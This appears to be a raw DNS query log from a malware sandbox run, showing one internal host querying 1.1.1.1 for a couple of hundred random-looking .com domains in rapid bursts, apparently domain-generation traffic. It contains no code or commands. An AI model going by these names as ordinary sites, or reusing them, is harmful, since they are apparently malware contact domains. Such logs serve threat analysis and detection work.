Nov 11, 2024 18:13:01.011066914 CET	192.168.2.6	1.1.1.1	0x4c32	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.011648893 CET	192.168.2.6	1.1.1.1	0x3ffb	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.018594980 CET	192.168.2.6	1.1.1.1	0xa0	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.824131012 CET	192.168.2.6	1.1.1.1	0xdfac	Standard query (0)	pupydeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.851231098 CET	192.168.2.6	1.1.1.1	0x9955	Standard query (0)	ganyzub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.853267908 CET	192.168.2.6	1.1.1.1	0x7a05	Standard query (0)	lykymox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.880652905 CET	192.168.2.6	1.1.1.1	0x81ed	Standard query (0)	pujymip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.881987095 CET	192.168.2.6	1.1.1.1	0x7b33	Standard query (0)	qebylug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.883622885 CET	192.168.2.6	1.1.1.1	0x9302	Standard query (0)	vopydek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.885565996 CET	192.168.2.6	1.1.1.1	0x7ae4	Standard query (0)	gatydaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.889838934 CET	192.168.2.6	1.1.1.1	0x649d	Standard query (0)	vojymic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.892216921 CET	192.168.2.6	1.1.1.1	0x2264	Standard query (0)	gahynus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.893079042 CET	192.168.2.6	1.1.1.1	0x7ce0	Standard query (0)	puvylyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.906280041 CET	192.168.2.6	1.1.1.1	0xc497	Standard query (0)	vowypit.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.906454086 CET	192.168.2.6	1.1.1.1	0x62b1	Standard query (0)	qegynuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.906590939 CET	192.168.2.6	1.1.1.1	0x6035	Standard query (0)	pufybyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.906774998 CET	192.168.2.6	1.1.1.1	0xd20	Standard query (0)	lygynud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.906899929 CET	192.168.2.6	1.1.1.1	0x596	Standard query (0)	gacykeh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.915771008 CET	192.168.2.6	1.1.1.1	0x2d4c	Standard query (0)	purypol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.951781034 CET	192.168.2.6	1.1.1.1	0x7dbf	Standard query (0)	qetysal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.953144073 CET	192.168.2.6	1.1.1.1	0x458b	Standard query (0)	lyrysor.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.983674049 CET	192.168.2.6	1.1.1.1	0x7b5b	Standard query (0)	vocykem.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.989972115 CET	192.168.2.6	1.1.1.1	0xbdeb	Standard query (0)	volymum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.991375923 CET	192.168.2.6	1.1.1.1	0x11e1	Standard query (0)	lymylyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.995467901 CET	192.168.2.6	1.1.1.1	0x39f1	Standard query (0)	gadydas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.996298075 CET	192.168.2.6	1.1.1.1	0xf494	Standard query (0)	puzymig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.997622013 CET	192.168.2.6	1.1.1.1	0x4310	Standard query (0)	qeqylyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.998516083 CET	192.168.2.6	1.1.1.1	0xfe83	Standard query (0)	lyxymin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.998927116 CET	192.168.2.6	1.1.1.1	0x1006	Standard query (0)	gaqyzuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.000077963 CET	192.168.2.6	1.1.1.1	0xb2dc	Standard query (0)	vofydac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.000868082 CET	192.168.2.6	1.1.1.1	0x7a16	Standard query (0)	vowyzuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.002047062 CET	192.168.2.6	1.1.1.1	0x2678	Standard query (0)	lygyfex.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.003528118 CET	192.168.2.6	1.1.1.1	0x7769	Standard query (0)	gacyqob.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.004714012 CET	192.168.2.6	1.1.1.1	0x3af1	Standard query (0)	puryxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.005692005 CET	192.168.2.6	1.1.1.1	0x51b7	Standard query (0)	qegyfyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.006777048 CET	192.168.2.6	1.1.1.1	0x4c61	Standard query (0)	vocyqaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.006974936 CET	192.168.2.6	1.1.1.1	0xf56e	Standard query (0)	lyryxij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.008454084 CET	192.168.2.6	1.1.1.1	0x8158	Standard query (0)	gahyfyz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.009274006 CET	192.168.2.6	1.1.1.1	0xb0a3	Standard query (0)	puvywav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.015732050 CET	192.168.2.6	1.1.1.1	0xd584	Standard query (0)	vojygut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.016840935 CET	192.168.2.6	1.1.1.1	0x438	Standard query (0)	gatycoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.019961119 CET	192.168.2.6	1.1.1.1	0x2b15	Standard query (0)	qexykaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.021548986 CET	192.168.2.6	1.1.1.1	0x7c8c	Standard query (0)	lyvywed.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.022109985 CET	192.168.2.6	1.1.1.1	0x1c5b	Standard query (0)	qebyrev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.023583889 CET	192.168.2.6	1.1.1.1	0xc3ce	Standard query (0)	vopycom.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.024159908 CET	192.168.2.6	1.1.1.1	0xaf8a	Standard query (0)	pupycag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.025298119 CET	192.168.2.6	1.1.1.1	0x3a0a	Standard query (0)	vonyryc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.026283979 CET	192.168.2.6	1.1.1.1	0x95c	Standard query (0)	lysyvan.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.027107000 CET	192.168.2.6	1.1.1.1	0xf84	Standard query (0)	galyhiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.031053066 CET	192.168.2.6	1.1.1.1	0xb2ce	Standard query (0)	lykygur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.031212091 CET	192.168.2.6	1.1.1.1	0xedfa	Standard query (0)	volyjok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.032042027 CET	192.168.2.6	1.1.1.1	0x70e6	Standard query (0)	pufydep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.033179998 CET	192.168.2.6	1.1.1.1	0x56c6	Standard query (0)	qetyxiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.033796072 CET	192.168.2.6	1.1.1.1	0x3d1b	Standard query (0)	pumytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.034616947 CET	192.168.2.6	1.1.1.1	0x5e26	Standard query (0)	qexyqog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.145898104 CET	192.168.2.6	1.1.1.1	0x8b2c	Standard query (0)	qekyhil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.152420044 CET	192.168.2.6	1.1.1.1	0x739a	Standard query (0)	lymytux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.156913042 CET	192.168.2.6	1.1.1.1	0xba1f	Standard query (0)	qedyveg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.159832954 CET	192.168.2.6	1.1.1.1	0xf36c	Standard query (0)	pujygul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.170006037 CET	192.168.2.6	1.1.1.1	0x8268	Standard query (0)	gadyveb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.209096909 CET	192.168.2.6	1.1.1.1	0xbaa7	Standard query (0)	ganyrys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.227040052 CET	192.168.2.6	1.1.1.1	0xcbbc	Standard query (0)	gaqypiz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.228208065 CET	192.168.2.6	1.1.1.1	0xefe4	Standard query (0)	lyxyjaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.229670048 CET	192.168.2.6	1.1.1.1	0xfa3d	Standard query (0)	vofybyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.269134045 CET	192.168.2.6	1.1.1.1	0xb03b	Standard query (0)	lyvylyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.269896984 CET	192.168.2.6	1.1.1.1	0x7b33	Standard query (0)	puzyjoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.270788908 CET	192.168.2.6	1.1.1.1	0xb503	Standard query (0)	qeqytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.626756907 CET	192.168.2.6	1.1.1.1	0xe280	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.627233982 CET	192.168.2.6	1.1.1.1	0xe4f6	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.627679110 CET	192.168.2.6	1.1.1.1	0x9f72	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.628077030 CET	192.168.2.6	1.1.1.1	0x790e	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.634454966 CET	192.168.2.6	1.1.1.1	0xdd8a	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.635454893 CET	192.168.2.6	1.1.1.1	0x1eb	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.636738062 CET	192.168.2.6	1.1.1.1	0xa360	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.666718006 CET	192.168.2.6	1.1.1.1	0x3aa1	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.707135916 CET	192.168.2.6	1.1.1.1	0x208c	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.712532043 CET	192.168.2.6	1.1.1.1	0x1d41	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.716716051 CET	192.168.2.6	1.1.1.1	0x9d07	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.721795082 CET	192.168.2.6	1.1.1.1	0xa2ef	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.747279882 CET	192.168.2.6	1.1.1.1	0x7c73	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.747648001 CET	192.168.2.6	1.1.1.1	0x67d4	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.792717934 CET	192.168.2.6	1.1.1.1	0x7bb7	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.793483973 CET	192.168.2.6	1.1.1.1	0xd496	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.794289112 CET	192.168.2.6	1.1.1.1	0x11e3	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.799484968 CET	192.168.2.6	1.1.1.1	0x5b50	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.813673973 CET	192.168.2.6	1.1.1.1	0xf33d	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.844245911 CET	192.168.2.6	1.1.1.1	0x5c5b	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.847687960 CET	192.168.2.6	1.1.1.1	0xe2b0	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.849319935 CET	192.168.2.6	1.1.1.1	0x2f1b	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.849733114 CET	192.168.2.6	1.1.1.1	0x30b5	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.852325916 CET	192.168.2.6	1.1.1.1	0x3f4d	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.853288889 CET	192.168.2.6	1.1.1.1	0xb23f	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.853884935 CET	192.168.2.6	1.1.1.1	0x61ae	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.874237061 CET	192.168.2.6	1.1.1.1	0xe845	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.874397993 CET	192.168.2.6	1.1.1.1	0x6290	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.874634027 CET	192.168.2.6	1.1.1.1	0x16e9	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.874802113 CET	192.168.2.6	1.1.1.1	0x5629	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.875186920 CET	192.168.2.6	1.1.1.1	0x6dcb	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.875339031 CET	192.168.2.6	1.1.1.1	0x4aa1	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.875653982 CET	192.168.2.6	1.1.1.1	0xd12c	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.875804901 CET	192.168.2.6	1.1.1.1	0x7bb0	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.876044989 CET	192.168.2.6	1.1.1.1	0xc0e3	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.876194000 CET	192.168.2.6	1.1.1.1	0xe6c2	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.876564980 CET	192.168.2.6	1.1.1.1	0xf000	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.876734018 CET	192.168.2.6	1.1.1.1	0xde30	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.877048016 CET	192.168.2.6	1.1.1.1	0xa025	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.877496958 CET	192.168.2.6	1.1.1.1	0xbff8	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.894145012 CET	192.168.2.6	1.1.1.1	0x4eeb	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.894836903 CET	192.168.2.6	1.1.1.1	0xea4b	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.895004988 CET	192.168.2.6	1.1.1.1	0x4ff6	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.895270109 CET	192.168.2.6	1.1.1.1	0xce08	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.897265911 CET	192.168.2.6	1.1.1.1	0x2625	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.900412083 CET	192.168.2.6	1.1.1.1	0xff34	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.109793901 CET	192.168.2.6	1.1.1.1	0x9405	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.125233889 CET	192.168.2.6	1.1.1.1	0x6107	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.125672102 CET	192.168.2.6	1.1.1.1	0x5092	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.125849009 CET	192.168.2.6	1.1.1.1	0xe42b	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.126183987 CET	192.168.2.6	1.1.1.1	0x24fc	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.126656055 CET	192.168.2.6	1.1.1.1	0x42b6	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.126811028 CET	192.168.2.6	1.1.1.1	0xbaf3	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.126964092 CET	192.168.2.6	1.1.1.1	0x546d	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.127110004 CET	192.168.2.6	1.1.1.1	0x72a5	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.127340078 CET	192.168.2.6	1.1.1.1	0xacb9	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.127466917 CET	192.168.2.6	1.1.1.1	0x7d14	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.127940893 CET	192.168.2.6	1.1.1.1	0x8a43	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.132618904 CET	192.168.2.6	1.1.1.1	0x11f8	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.132819891 CET	192.168.2.6	1.1.1.1	0xa899	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.133174896 CET	192.168.2.6	1.1.1.1	0xb4a7	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.134609938 CET	192.168.2.6	1.1.1.1	0xa630	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.134870052 CET	192.168.2.6	1.1.1.1	0x9f98	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.135229111 CET	192.168.2.6	1.1.1.1	0x62fa	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.782835007 CET	192.168.2.6	1.1.1.1	0x7bb7	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.876529932 CET	192.168.2.6	1.1.1.1	0xd12c	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.907783985 CET	192.168.2.6	1.1.1.1	0x2625	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.907840014 CET	192.168.2.6	1.1.1.1	0xce08	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:13.538734913 CET	192.168.2.6	1.1.1.1	0xab6f	Standard query (0)	ww25.lyxynyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:13.770032883 CET	192.168.2.6	1.1.1.1	0xa716	Standard query (0)	ww16.vofycot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.985619068 CET	192.168.2.6	1.1.1.1	0x68b3	Standard query (0)	vopyret.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.987663984 CET	192.168.2.6	1.1.1.1	0x5be	Standard query (0)	qekyvav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.988095999 CET	192.168.2.6	1.1.1.1	0x9c36	Standard query (0)	lykyvod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.989255905 CET	192.168.2.6	1.1.1.1	0x2070	Standard query (0)	pupytyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.990083933 CET	192.168.2.6	1.1.1.1	0x694c	Standard query (0)	ganyhuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.994093895 CET	192.168.2.6	1.1.1.1	0xb865	Standard query (0)	galyvas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.994191885 CET	192.168.2.6	1.1.1.1	0xeff3	Standard query (0)	qebyhuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.014750004 CET	192.168.2.6	1.1.1.1	0xbffb	Standard query (0)	lymyjon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.015819073 CET	192.168.2.6	1.1.1.1	0x1052	Standard query (0)	pujycov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.016026020 CET	192.168.2.6	1.1.1.1	0xc89f	Standard query (0)	vonyjim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.016330004 CET	192.168.2.6	1.1.1.1	0xe980	Standard query (0)	gadypuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.017013073 CET	192.168.2.6	1.1.1.1	0x81ef	Standard query (0)	lysytyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.019098997 CET	192.168.2.6	1.1.1.1	0x4553	Standard query (0)	lyvyguj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.024844885 CET	192.168.2.6	1.1.1.1	0xb19c	Standard query (0)	vofypuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.036915064 CET	192.168.2.6	1.1.1.1	0x4078	Standard query (0)	pumymuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.060178995 CET	192.168.2.6	1.1.1.1	0x3e22	Standard query (0)	lyxyfar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.086448908 CET	192.168.2.6	1.1.1.1	0x8dbc	Standard query (0)	qebynyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.087218046 CET	192.168.2.6	1.1.1.1	0x14bb	Standard query (0)	lykysix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.087801933 CET	192.168.2.6	1.1.1.1	0x30f5	Standard query (0)	ganynyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.088470936 CET	192.168.2.6	1.1.1.1	0xec62	Standard query (0)	vopykak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.090010881 CET	192.168.2.6	1.1.1.1	0x9849	Standard query (0)	gahycib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.090385914 CET	192.168.2.6	1.1.1.1	0x40	Standard query (0)	qegytyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.090861082 CET	192.168.2.6	1.1.1.1	0xfe34	Standard query (0)	qetyrap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.091530085 CET	192.168.2.6	1.1.1.1	0x3466	Standard query (0)	purywop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.091897011 CET	192.168.2.6	1.1.1.1	0x5b11	Standard query (0)	lysylej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.092200041 CET	192.168.2.6	1.1.1.1	0x873b	Standard query (0)	vonymuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.092442989 CET	192.168.2.6	1.1.1.1	0x93c9	Standard query (0)	gacyvah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.092935085 CET	192.168.2.6	1.1.1.1	0x51e	Standard query (0)	gadyzyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.093346119 CET	192.168.2.6	1.1.1.1	0x6524	Standard query (0)	lymymud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.093688965 CET	192.168.2.6	1.1.1.1	0xfcf4	Standard query (0)	qeqykog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.093877077 CET	192.168.2.6	1.1.1.1	0xa652	Standard query (0)	puryjil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.094329119 CET	192.168.2.6	1.1.1.1	0xc1b6	Standard query (0)	gacyfew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.094506025 CET	192.168.2.6	1.1.1.1	0xb658	Standard query (0)	gaqyqis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.095033884 CET	192.168.2.6	1.1.1.1	0x5ae9	Standard query (0)	puvygyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.095612049 CET	192.168.2.6	1.1.1.1	0xc8e8	Standard query (0)	qegyxug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.171886921 CET	192.168.2.6	1.1.1.1	0x20cc	Standard query (0)	vojycif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.174132109 CET	192.168.2.6	1.1.1.1	0xa312	Standard query (0)	pupylaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.174468994 CET	192.168.2.6	1.1.1.1	0x6e7a	Standard query (0)	gatykow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.174639940 CET	192.168.2.6	1.1.1.1	0x6e9e	Standard query (0)	lyvynen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.208836079 CET	192.168.2.6	1.1.1.1	0x56d3	Standard query (0)	vofyzym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.209039927 CET	192.168.2.6	1.1.1.1	0xfe26	Standard query (0)	vocygyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.215931892 CET	192.168.2.6	1.1.1.1	0xd752	Standard query (0)	gatyrez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.216207027 CET	192.168.2.6	1.1.1.1	0xfd3a	Standard query (0)	galydoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.216664076 CET	192.168.2.6	1.1.1.1	0x58de	Standard query (0)	qedyleq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.218756914 CET	192.168.2.6	1.1.1.1	0xa263	Standard query (0)	qedytul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.219135046 CET	192.168.2.6	1.1.1.1	0x3755	Standard query (0)	vowyqoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.219307899 CET	192.168.2.6	1.1.1.1	0xee4f	Standard query (0)	volybec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.219444036 CET	192.168.2.6	1.1.1.1	0x6c6d	Standard query (0)	lyrywax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.220017910 CET	192.168.2.6	1.1.1.1	0xa609	Standard query (0)	puzydal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.220242023 CET	192.168.2.6	1.1.1.1	0xe9e5	Standard query (0)	volydot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.220453978 CET	192.168.2.6	1.1.1.1	0x1950	Standard query (0)	qexyfel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.220453978 CET	192.168.2.6	1.1.1.1	0xf634	Standard query (0)	qeqyqiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.220700026 CET	192.168.2.6	1.1.1.1	0x48f9	Standard query (0)	lygyxun.com	A (IP address)	IN (0x0001)	false
